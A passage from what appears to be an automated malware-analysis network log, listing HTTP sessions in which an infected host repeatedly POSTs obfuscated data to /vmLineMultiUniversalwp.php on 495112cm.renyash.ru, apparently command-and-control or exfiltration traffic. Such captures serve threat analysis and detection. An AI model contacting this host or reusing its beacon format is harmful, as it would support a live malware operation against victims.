                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          130192.168.2.450138104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:21.313066959 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:21.670690060 CET2520OUTData Raw: 54 58 5b 57 55 59 5a 51 5c 5b 52 58 57 5b 58 5e 58 57 5a 5d 52 56 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WUYZQ\[RXW[X^XWZ]RVQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B>37;)2/]><5=5&>4>*(?#+@47>>Y=!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:21.786860943 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:22.061166048 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mCq8%2BMbhvUD6ExfLOTMIRRA08Ee%2FKcSuJH0hJkDmWtlYJgysGpGsdjPn0Yhfyk0aouZHGZLC%2FujSNv2sWpl0%2BfAxGf6xSon1QTW7qxe1qJ4eMimyfHzD2prSQxwwfGXEpUTy03Yd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ebedcc4439d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1755&rtt_var=5592&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=67938&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          131192.168.2.450139104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:22.187225103 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:22.545805931 CET2520OUTData Raw: 54 5f 5e 5e 50 59 5f 54 5c 5b 52 58 57 5b 58 5f 58 57 5a 5a 52 53 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^^PY_T\[RXW[X_XWZZRSQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*)7A"8!P%;\=/96-$' .+/;_(67\4>"X)!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:22.660445929 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:22.928792000 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GkTKW8LY7oJKE1pV1ayfV6TS%2BTu4psRMvGT1XkhN7QAV0PCnYDz7zg421pqnhMWxUt32bcWJuRnfnvKpMdKIeKIta4OGYSOIHnwvTLb2OrZ9ALe9Efpuh3r2ayn7QuGzHk%2FCl11w"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ec4490a8c7b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=2007&rtt_var=6128&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=62103&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          132192.168.2.450140104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:23.047032118 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:23.405004978 CET2520OUTData Raw: 54 5e 5b 50 55 5f 5f 51 5c 5b 52 58 57 59 58 5d 58 54 5a 5e 52 51 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^[PU__Q\[RXWYX]XTZ^RQQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=+C#8T&]*Z%[6!0=8#Q+;^+%'#=>!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:23.499315977 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:23.763359070 CET815INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fop%2BeOhSduZ%2BOGrL0I5tmaSIy0j85V0sdUnxiil6DSR5ljECuINyb8NQmTbqwSd%2BUJPgI%2B71sHPf8yn%2FnkM%2B4fz9aIuMZgawlZ4GA85C5BdXAZRbHIblWJV5Dmer3dGYQOH%2BmfTd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ec98d1b7cb2-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2615&min_rtt=1884&rtt_var=2169&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=188728&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          133192.168.2.450141104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:23.897635937 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:24.248899937 CET2520OUTData Raw: 54 5a 5e 50 55 5e 5f 51 5c 5b 52 58 57 58 58 5c 58 50 5a 59 52 53 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^PU^_Q\[RXWXX\XPZYRSQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:,4;)Q%# *?%Z!.!'>+R -:(,+5;Z#.9>!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:24.342242002 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:24.603180885 CET803INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lldxRD84KBPBu7qqe4cK6EmQ5HITGVDfth3JFu3QxFbH%2FzBr0VYwO4MpXCgMOQtPXR9TvIjpXD763rPwwz5SID4k0uV%2BN7gez0rnagQlS6B9GUgyz7xfUNeLls6Hl6tv87tjTKyt"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ecedc2242e6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8453&min_rtt=1763&rtt_var=14042&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=26406&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          134192.168.2.450142104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:24.741554976 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:25.092591047 CET2520OUTData Raw: 54 5c 5b 57 55 5d 5a 57 5c 5b 52 58 57 5b 58 5d 58 51 5a 5a 52 54 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[WU]ZW\[RXW[X]XQZZRTQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=*?7+9Q&U(>?&!=0=$#&W('+[4>9>+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:25.186860085 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:25.442658901 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLQ6svXQdiHgXQM4K97tJ8wXg%2BaP5nBPfaT1TJjz%2FyxcMPp4kwugiPxG5ZZSfoWcKZHJQxQ3u3OcIaWmXF0ME1Q9k9bAncAq2lMm%2FSCTjX2k8RwfBQ50cBg%2BDnblNd1Du9CFGOyR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ed42f230fa8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4111&min_rtt=1544&rtt_var=5713&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=66114&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          135192.168.2.450143104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:25.566207886 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:25.920649052 CET2520OUTData Raw: 51 5a 5b 57 55 5c 5a 5c 5c 5b 52 58 57 5c 58 53 58 55 5a 53 52 53 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[WU\Z\\[RXW\XSXUZSRSQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)( (%(=/9!90X#Q4>+,3_?%#">:^*!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:26.034452915 CET25INHTTP/1.1 100 Continue


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          136192.168.2.450144104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:26.098488092 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:26.455554008 CET1844OUTData Raw: 51 5c 5e 57 55 58 5f 51 5c 5b 52 58 57 58 58 52 58 52 5a 53 52 5d 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^WUX_Q\[RXWXXRXRZSR]QY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*9?C"851(=,)5%X3-44>S+0(6?72^=;!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:26.561803102 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:26.836464882 CET951INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o3ywnauXhPeN6utEwLFmgYABnFaVKnglOgGKWAkZF8dmZdYCz1BDlZd2Vt5nxv0bbPImTHv9aap0irtklh4aRqMUcnDYNbd%2BoGQvHcK4U0Kk7p983EjcNWXo%2FbEP4RdgXE1Sk4vL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6edcbceb7288-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4998&min_rtt=1944&rtt_var=6837&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=55351&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 10 0e 1d 22 01 0d 00 29 2e 2e 5f 25 33 3f 07 2c 32 27 5f 23 5a 27 12 2c 0c 29 5b 27 0d 01 01 3d 01 28 1d 37 09 33 54 27 0a 2a 5d 06 12 38 12 28 02 3a 10 25 02 32 54 2a 0b 31 1d 26 26 3d 07 30 3e 2b 1e 3c 02 3d 14 32 5a 35 1d 2a 06 2d 06 3a 2a 0e 40 2c 5a 34 57 22 03 21 53 08 13 20 13 26 0f 09 57 29 30 13 5a 25 23 18 04 27 04 23 55 2a 16 2f 09 25 3d 2e 17 2c 22 27 1e 3c 0a 27 03 2e 3e 0d 07 2b 07 3c 0d 24 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+").._%3?,2'_#Z',)['=(73T'*]8(:%2T*1&&=0>+<=2Z5*-:*@,Z4W"!S &W)0Z%#'#U*/%=.,"'<'.>+<$,"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          137192.168.2.450145104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:26.218240023 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:26.579560041 CET2516OUTData Raw: 51 59 5e 5f 55 52 5a 56 5c 5b 52 58 57 5a 58 5f 58 54 5a 59 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^_URZV\[RXWZX_XTZYRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*<4;&&;X>Z)![*0> #*),*&8 =&[)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:26.685051918 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:26.956968069 CET815INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQfOhfjAAatlp0CYM5Tt1JCaDF6%2BlDAovTjgOlC%2BFX3MBHY0qV%2BtrXY%2Fh25aTDsI5qHZQhaW0nXow8xwEBpkGid03bedAEBzu72CvMpdzoh%2BgF%2F7kJa8shkK8LOrt%2BAXDPzI9dG%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6edd7e920fa4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2941&min_rtt=1561&rtt_var=3346&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=115845&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          138192.168.2.450146104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:27.083452940 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:27.436322927 CET2520OUTData Raw: 51 59 5e 53 50 5e 5a 56 5c 5b 52 58 57 52 58 5d 58 57 5a 53 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^SP^ZV\[RXWRX]XWZSRWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.))785%4=?5Y!-*376R+0(&' &_>;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:27.537556887 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:27.712111950 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCIuI1OzCDi1Ui%2FpMMJd5TDaXpyhPl8pS0fwMRz1YOLcCKuKn9m2%2B0LB2I7GIwY8lAUVzmthiB%2B74mU8SIw1C%2FTN2QJ3N49gX1IFuCgwokuUhczTaPr86kN3h9Z62KBT1bLOvGSB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ee2da20c425-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1481&rtt_var=4456&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=85455&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          139192.168.2.450147104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:27.851675987 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:28.201920033 CET2520OUTData Raw: 54 5d 5b 54 50 5b 5a 57 5c 5b 52 58 57 5f 58 5f 58 5c 5a 5c 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T][TP[ZW\[RXW_X_X\Z\RQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=4#+"'#'\*?2!%Y377>!+/0(<4[.)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:28.304510117 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:28.561491966 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dcVje%2Bi5MoF66dujfTB5U4aVfXNjCnE31%2BlNGlKd8hWXRYi5uqxji1Za%2BTvM8pwY3Xra2gy%2BhpYruhENGCsseZtQQK7d3lJNgWT7A4v7QgI9z46zjoErhwgIIIpW6ghMrNbN6vWK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ee79f4272b9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
